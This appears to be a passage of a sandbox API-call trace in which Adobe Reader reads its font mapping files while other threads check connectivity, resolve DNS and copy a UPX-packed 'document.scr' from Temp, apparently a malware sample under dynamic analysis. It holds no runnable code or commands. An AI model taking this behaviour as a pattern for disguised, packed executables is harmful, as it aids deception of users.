FileName => C:\Program Files\Adobe\Reader 11.0\Resource\TypeSupport\Unicode\Mappings\Adobe\*.* |
SUCCESS | 0x00169d88 | |
| 07:45:01,873 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000194 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xd0xV\xc7\xe6\x91\xcf\x01\xd0xV\xc7\xe6\x91\xcf\x01\xd0xV\xc7\xe6\x91\xcf\x01\xd0xV\xc7\xe6\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00marginx\x00\x00\x00\x00\x00\x00\x00\x00\xec\xab\xaf0\x9a\xcd\x01\xd0xV\xc7\xe6\x91\xcf\x01\x00\xec\xab\xaf0\x9a\xcd\x01\xd0xV\xc7\xe6\x91\xcf\x01\x8d(\x00\x00\x00\x00\x00\x00\x000\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00s\x00y\x00m\x00b\x00o\x00l\x00.\x00t\x00x\x00t\x00ormalT\x00\x00\x00\x00\x00\x00\x00\x00\x00\xec\xab\xaf0\x9a\xcd\x01\xd0xV\xc7\xe6\x91\xcf\x01\x00\xec\xab\xaf0\x9a\xcd\x01 |
SUCCESS | 0x00000000 | |
| 07:45:01,873 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Program Files\Adobe\Reader 11.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 07:45:01,873 | 504 | NtReadFile |
Buffer => ##Adobe File Version: 1.000
#
# Name: Adobe Symbol Encoding to Unicode
# Unicode version: 2.0
# Table version: 0.2
# Date: 30 March 1999
#
# Copyright (c) 1991-1999 Unicode, Inc. All Rights reserved.
#
# This FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 07:45:01,903 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:45:01,903 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:45:01,903 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:45:01,903 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:45:01,903 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
| 07:45:01,944 | 504 | NtReadFile |
Buffer => FileHandle => 0x00000190 |
FAILURE | 3221225489 | |
| 07:45:01,944 | 504 | NtFreeVirtualMemory |
FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x00009000 BaseAddress => 0x00183000 |
SUCCESS | 0x00000000 | |
| 07:45:01,944 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Program Files\Adobe\Reader 11.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 07:45:01,954 | 504 | NtReadFile |
Buffer => ##Adobe File Version: 1.000
#
# Name: Adobe Zapf Dingbats Encoding to Unicode
# Unicode version: 2.0
# Table version: 0.2
# Date: 30 March 1999
#
# Copyright (c) 1991-1999 Unicode, Inc. All Rights reserved.
#
# FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 07:45:02,024 | 504 | NtReadFile |
Buffer => FileHandle => 0x00000190 |
FAILURE | 3221225489 | |
| 07:45:02,024 | 504 | NtFreeVirtualMemory |
FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x00009000 BaseAddress => 0x00183000 |
SUCCESS | 0x00000000 | |
| 07:45:02,024 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000194 FileInformation => |
FAILURE | 2147483654 | |
| 07:45:02,024 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:45:02,104 | 504 | FindFirstFileExW |
FileName => C:\Program Files\Adobe\Reader 11.0\Resource\TypeSupport\Unicode\Mappings\Mac\*.* |
SUCCESS | 0x00169d88 | |
| 07:45:02,104 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000194 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xa0\xf1T\xc7\xe6\x91\xcf\x01\xf0\xa3_\xc7\xe6\x91\xcf\x01 +a\xc7\xe6\x91\xcf\x01 +a\xc7\xe6\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00marginx\x00\x00\x00\x00\x00\x00\x00\x00\xec\xab\xaf0\x9a\xcd\x01 +a\xc7\xe6\x91\xcf\x01\x00\xec\xab\xaf0\x9a\xcd\x01 +a\xc7\xe6\x91\xcf\x01\x942\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00C\x00E\x00N\x00T\x00E\x00U\x00R\x00O\x00.\x00T\x00X\x00T\x00lTx\x00\x00\x00\x00\x00\x00\x00\x00\x19\xdd\xb00\x9a\xcd\x01\x00\x00X\xc7\xe6\x91\xcf\x01\x00\x19\xdd\xb00\x9a\xcd\x01 |
SUCCESS | 0x00000000 | |
| 07:45:02,114 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Program Files\Adobe\Reader 11.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 07:45:02,114 | 504 | NtReadFile |
Buffer => ##Adobe File Version: 1.000
#=======================================================================
# FTP file name: CENTEURO.TXT
#
# Contents: Map (external version) from Mac OS Central European
# character set to Unicod FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 07:45:02,194 | 504 | NtReadFile |
Buffer => FileHandle => 0x00000190 |
FAILURE | 3221225489 | |
| 07:45:02,194 | 504 | NtFreeVirtualMemory |
FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x00009000 BaseAddress => 0x00183000 |
SUCCESS | 0x00000000 | |
| 07:45:02,194 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Program Files\Adobe\Reader 11.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 07:45:02,204 | 504 | NtReadFile |
Buffer => ##Adobe File Version: 1.000
#=======================================================================
# FTP file name: CORPCHAR.TXT
#
# Contents: Registry (external version) of Apple use of
# Unicode corporate-zone char FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 07:45:02,274 | 504 | NtReadFile |
Buffer => FileHandle => 0x00000190 |
FAILURE | 3221225489 | |
| 07:45:02,284 | 504 | NtFreeVirtualMemory |
FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x00009000 BaseAddress => 0x00183000 |
SUCCESS | 0x00000000 | |
| 07:45:02,284 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Program Files\Adobe\Reader 11.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 07:45:02,284 | 504 | NtReadFile |
Buffer => ##Adobe File Version: 1.000
#=======================================================================
# FTP file name: CROATIAN.TXT
#
# Contents: Map (external version) from Mac OS Croatian
# character set to Unicode 2.1
# FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 07:45:02,314 | 504 | NtReadFile |
Buffer => FileHandle => 0x00000190 |
FAILURE | 3221225489 | |
| 07:45:02,314 | 504 | NtFreeVirtualMemory |
FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x00009000 BaseAddress => 0x00183000 |
SUCCESS | 0x00000000 | |
| 07:45:02,314 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Program Files\Adobe\Reader 11.0\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 07:45:02,324 | 504 | NtReadFile |
Buffer => ##Adobe File Version: 1.000
#=======================================================================
# FTP file name: CYRILLIC.TXT
#
# Contents: Map (external version) from Mac OS Cyrillic
# character set to Unicode 2.1
# FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 07:45:02,354 | 504 | NtReadFile |
Buffer => FileHandle => 0x00000190 |
FAILURE | 3221225489 | |
| 07:45:02,354 | 504 | NtFreeVirtualMemory |
FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x00009000 BaseAddress => 0x00183000 |
SUCCESS | 0x00000000 | |
| 07:45:02,354 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Program Files\Adobe\Reader 11.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 07:45:02,354 | 504 | NtReadFile |
Buffer => ##Adobe File Version: 1.000
#=======================================================================
# FTP file name: GREEK.TXT
#
# Contents: Map (external version) from Mac OS Greek
# character set to Unicode 2.1
#
# FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 07:45:02,474 | 504 | NtReadFile |
Buffer => FileHandle => 0x00000190 |
FAILURE | 3221225489 | |
| 07:45:02,474 | 504 | NtFreeVirtualMemory |
FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x00009000 BaseAddress => 0x00183000 |
SUCCESS | 0x00000000 | |
| 07:45:02,474 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Program Files\Adobe\Reader 11.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 07:45:02,474 | 504 | NtReadFile |
Buffer => ##Adobe File Version: 1.000
#=======================================================================
# FTP file name: ICELAND.TXT
#
# Contents: Map (external version) from Mac OS Icelandic
# character set to Unicode 2.1
# FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 07:45:02,504 | 504 | NtReadFile |
Buffer => FileHandle => 0x00000190 |
FAILURE | 3221225489 | |
| 07:45:02,504 | 504 | NtFreeVirtualMemory |
FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x00009000 BaseAddress => 0x00183000 |
SUCCESS | 0x00000000 | |
| 07:45:02,504 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Program Files\Adobe\Reader 11.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 07:45:02,514 | 504 | NtReadFile |
Buffer => ##Adobe File Version: 1.000
#=======================================================================
# FTP file name: ROMAN.TXT
#
# Contents: Map (external version) from Mac OS Roman
# character set to Unicode 2.1
#
# FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 07:45:02,544 | 504 | NtReadFile |
Buffer => FileHandle => 0x00000190 |
FAILURE | 3221225489 | |
| 07:45:02,544 | 504 | NtFreeVirtualMemory |
FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x00009000 BaseAddress => 0x00183000 |
SUCCESS | 0x00000000 | |
| 07:45:02,544 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Program Files\Adobe\Reader 11.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 07:45:02,554 | 504 | NtReadFile |
Buffer => ##Adobe File Version: 1.000
#=======================================================================
# FTP file name: ROMANIAN.TXT
#
# Contents: Map (external version) from Mac OS Romanian
# character set to Unicode 2.1
# FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 07:45:02,584 | 504 | NtReadFile |
Buffer => FileHandle => 0x00000190 |
FAILURE | 3221225489 | |
| 07:45:02,584 | 504 | NtFreeVirtualMemory |
FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x00009000 BaseAddress => 0x00183000 |
SUCCESS | 0x00000000 | |
| 07:45:02,594 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Program Files\Adobe\Reader 11.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 07:45:02,594 | 504 | NtReadFile |
Buffer => ##Adobe File Version: 1.000
#=======================================================================
# FTP file name: SYMBOL.TXT
#
# Contents: Map (external version) from Mac OS Symbol
# character set to Unicode 2.1
#
# FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 07:45:02,625 | 504 | NtReadFile |
Buffer => FileHandle => 0x00000190 |
FAILURE | 3221225489 | |
| 07:45:02,625 | 504 | NtFreeVirtualMemory |
FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x00009000 BaseAddress => 0x00183000 |
SUCCESS | 0x00000000 | |
| 07:45:02,625 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Program Files\Adobe\Reader 11.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 07:45:02,635 | 504 | NtReadFile |
Buffer => ##Adobe File Version: 1.000
#=======================================================================
# FTP file name: TURKISH.TXT
#
# Contents: Map (external version) from Mac OS Turkish
# character set to Unicode 2.1
#
FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 07:45:02,665 | 504 | NtReadFile |
Buffer => FileHandle => 0x00000190 |
FAILURE | 3221225489 | |
| 07:45:02,665 | 504 | NtFreeVirtualMemory |
FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x00009000 BaseAddress => 0x00183000 |
SUCCESS | 0x00000000 | |
| 07:45:02,665 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Program Files\Adobe\Reader 11.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 07:45:02,665 | 504 | NtReadFile |
Buffer => ##Adobe File Version: 1.000
#=======================================================================
# FTP file name: UKRAINE.TXT
#
# Contents: Notes on Mac OS Ukrainian character set
#
# Copyright: (c) 1995-1999 by Apple Computer, FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 07:45:02,675 | 504 | NtReadFile |
Buffer => FileHandle => 0x00000190 |
FAILURE | 3221225489 | |
| 07:45:02,675 | 504 | NtFreeVirtualMemory |
FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x00009000 BaseAddress => 0x00183000 |
SUCCESS | 0x00000000 | |
| 07:45:02,675 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000194 FileInformation => |
FAILURE | 2147483654 | |
| 07:45:02,675 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:45:02,705 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:45:02,705 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:45:02,705 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:45:02,705 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:45:02,705 | 1308 | CreateThread |
ThreadId => 1600 StartRoutine => 0x00504a37 Parameter => 0x00172cd0 CreationFlags => 0 |
SUCCESS | 0x00000194 | |
| 07:45:02,705 | 1308 | NtDelayExecution |
Milliseconds => 85 |
SUCCESS | 0x00000000 | |
| 07:45:02,705 | 1600 | LdrGetDllHandle |
ModuleHandle => 0x76f20000 FileName => dnsapi.dll |
SUCCESS | 0x00000000 | |
| 07:45:02,705 | 1600 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => DnsQuery_A FunctionAddress => 0x76f3684b ModuleHandle => 0x76f20000 |
SUCCESS | 0x00000000 | |
| 07:45:02,755 | 504 | FindFirstFileExW |
FileName => C:\Program Files\Adobe\Reader 11.0\Resource\TypeSupport\Unicode\Mappings\win\*.* |
SUCCESS | 0x00169d88 | |
| 07:45:02,755 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001b8 FileInformation => h\x00\x00\x00\x00\x00\x00\x00P?J\xc7\xe6\x91\xcf\x01@\xe3Q\xc7\xe6\x91\xcf\x01pjS\xc7\xe6\x91\xcf\x01pjS\xc7\xe6\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00marginx\x00\x00\x00\x00\x00\x00\x00\x00\xec\xab\xaf0\x9a\xcd\x01pjS\xc7\xe6\x91\xcf\x01\x00\xec\xab\xaf0\x9a\xcd\x01pjS\xc7\xe6\x91\xcf\x01d&\x00\x00\x00\x00\x00\x00\x000\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00C\x00P\x001\x002\x005\x000\x00.\x00T\x00X\x00T\x00X\x00T\x00lTx\x00\x00\x00\x00\x00\x00\x00\x00\xec\xab\xaf0\x9a\xcd\x01@\xe3Q\xc7\xe6\x91\xcf\x01\x00\xec\xab\xaf0\x9a\xcd\x01 |
SUCCESS | 0x00000000 | |
| 07:45:02,755 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Program Files\Adobe\Reader 11.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:45:02,755 | 504 | NtReadFile |
Buffer => ##Adobe File Version: 1.000
#
# Name: cp1250 to Unicode table
# Unicode version: 2.0
# Table version: 2.01
# Table format: Format A
# Date: 04/15/98
#
# Contact: cpxlate@microsoft.com
#
# General notes: no FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:45:02,775 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001bc |
FAILURE | 3221225489 | |
| 07:45:02,775 | 504 | NtFreeVirtualMemory |
FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x00009000 BaseAddress => 0x00183000 |
SUCCESS | 0x00000000 | |
| 07:45:02,775 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Program Files\Adobe\Reader 11.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:45:02,785 | 504 | NtReadFile |
Buffer => ##Adobe File Version: 1.000
#
# Name: cp1251 to Unicode table
# Unicode version: 2.0
# Table version: 2.01
# Table format: Format A
# Date: 04/15/98
#
# Contact: cpxlate@microsoft.com
#
# General notes: no FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:45:02,795 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:45:02,795 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:45:02,795 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:45:02,795 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:45:02,795 | 1308 | CreateThread |
ThreadId => 1592 StartRoutine => 0x00504a37 Parameter => 0x0016f360 CreationFlags => 0 |
SUCCESS | 0x000001c8 | |
| 07:45:02,795 | 1308 | NtDelayExecution |
Milliseconds => 85 |
SUCCESS | 0x00000000 | |
| 07:45:02,795 | 1592 | LdrGetDllHandle |
ModuleHandle => 0x76f20000 FileName => dnsapi.dll |
SUCCESS | 0x00000000 | |
| 07:45:02,795 | 1592 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => DnsQuery_A FunctionAddress => 0x76f3684b ModuleHandle => 0x76f20000 |
SUCCESS | 0x00000000 | |
| 07:45:02,805 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001bc |
FAILURE | 3221225489 | |
| 07:45:02,805 | 504 | NtFreeVirtualMemory |
FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x00009000 BaseAddress => 0x00183000 |
SUCCESS | 0x00000000 | |
| 07:45:02,815 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Program Files\Adobe\Reader 11.0\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:45:02,815 | 504 | NtReadFile |
Buffer => ##Adobe File Version: 1.000
#
# Name: cp1252 to Unicode table
# Unicode version: 2.0
# Table version: 2.01
# Table format: Format A
# Date: 04/15/98
#
# Contact: cpxlate@microsoft.com
#
# General notes: no FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:45:02,845 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001bc |
FAILURE | 3221225489 | |
| 07:45:02,845 | 504 | NtFreeVirtualMemory |
FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x00009000 BaseAddress => 0x00183000 |
SUCCESS | 0x00000000 | |
| 07:45:02,845 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Program Files\Adobe\Reader 11.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:45:02,845 | 504 | NtReadFile |
Buffer => ##Adobe File Version: 1.000
#
# Name: cp1253 to Unicode table
# Unicode version: 2.0
# Table version: 2.01
# Table format: Format A
# Date: 04/15/98
#
# Contact: cpxlate@microsoft.com
#
# General notes: no FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:45:02,865 | 1600 | NtCreateFile |
ShareAccess => 0 FileName => C:\DOCUME~1\TDW\LOCALS~1\Temp\tmp4.tmp DesiredAccess => 0x80100080 CreateDisposition => 2 FileHandle => 0x000001d8 |
SUCCESS | 0x00000000 | |
| 07:45:02,865 | 1600 | CopyFileA |
ExistingFileName => C:\DOCUME~1\TDW\LOCALS~1\Temp\document.scr NewFileName => C:\DOCUME~1\TDW\LOCALS~1\Temp\tmp4.tmp |
SUCCESS | 0x00000001 | |
| 07:45:02,865 | 1600 | NtCreateFile |
ShareAccess => 3 FileName => C:\DOCUME~1\TDW\LOCALS~1\Temp\tmp4.tmp DesiredAccess => 0xc0100080 CreateDisposition => 1 FileHandle => 0x000001dc |
SUCCESS | 0x00000000 | |
| 07:45:02,865 | 1600 | NtSetInformationFile |
FileHandle => 0x000001dc FileInformation => |
SUCCESS | 0x00000000 | |
| 07:45:02,865 | 1600 | NtReadFile |
Buffer => \xd8\x00\x00\x00 FileHandle => 0x000001dc |
SUCCESS | 0x00000000 | |
| 07:45:02,865 | 1600 | NtSetInformationFile |
FileHandle => 0x000001dc FileInformation => |
SUCCESS | 0x00000000 | |
| 07:45:02,885 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:45:02,885 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:45:02,885 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:45:02,885 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:45:02,885 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
| 07:45:02,885 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001bc |
FAILURE | 3221225489 | |
| 07:45:02,885 | 504 | NtFreeVirtualMemory |
FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x00009000 BaseAddress => 0x00183000 |
SUCCESS | 0x00000000 | |
| 07:45:02,895 | 1600 | NtReadFile |
Buffer => PE\x00\x00L\x01\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe0\x00 FileHandle => 0x000001dc |
SUCCESS | 0x00000000 | |
| 07:45:02,895 | 1600 | NtSetInformationFile |
FileHandle => 0x000001dc FileInformation => |
SUCCESS | 0x00000000 | |
| 07:45:02,895 | 1600 | NtReadFile |
Buffer => UPX0\x00\x00\x00\x00\x00\x80\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\xe0 FileHandle => 0x000001dc |
SUCCESS | 0x00000000 | |
| 07:45:02,895 | 1600 | NtReadFile |
Buffer => UPX1\x00\x00\x00\x00\x00`\x00\x00\x00\x90\x00\x00\x00`\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00@\x00\x00\xe0 FileHandle => 0x000001dc |
SUCCESS | 0x00000000 | |
| 07:45:02,895 | 1600 | NtReadFile |
Buffer => .rsrc\x00\x00\x00\x00\x10\x00\x00\x00\xf0\x00\x00\x00\x08\x00\x00\x00d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00@\x00\x00\xc0 FileHandle => 0x000001dc |
SUCCESS | 0x00000000 | |
| 07:45:02,895 | 1600 | NtSetInformationFile |
FileHandle => 0x000001dc FileInformation => |
SUCCESS | 0x00000000 | |
| 07:45:02,895 | 1600 | NtCreateFile |
ShareAccess => 3 FileName => C:\DOCUME~1\TDW\LOCALS~1\Temp\zincite.log DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:45:02,895 | 1600 | NtReadFile |
Buffer =>
\xf9pu\xff\x87\x8f\x81
\xea\xae\xdc\xf5\xd5\xae\xa8\xf5#\xba:
\xe1\x9a\xf5\x08#\xbb\xf5XQ\x8b\x95\xbez\x87\xaa\xe9\x8e'\xaa\xe9\x85\x0e\x15A\x85y\xaa\xe9\x84\x7fq\x04*m\xc3\xbf\xf3\xafe\xc3\xc2\xc6D\x18\x06\x90{O\xf9\x12\xab\x96\xd0K\xb4\xe7\x13m\xab\xd2(\xdckZ=}{O\xf8Ny\x85\xa5h\x83\xfa1\xda\xd7\xe74og@\xf6\xf1\xbc\xad\xcfal\x12\xf4\xbc\xbc\xad\xce(l \xfc\x0fg@^\x8d\xa0\x0c\x14\xab\xf4\x11\xc1cD\xb6\xa6\x94[\x03\xa0;\xf6
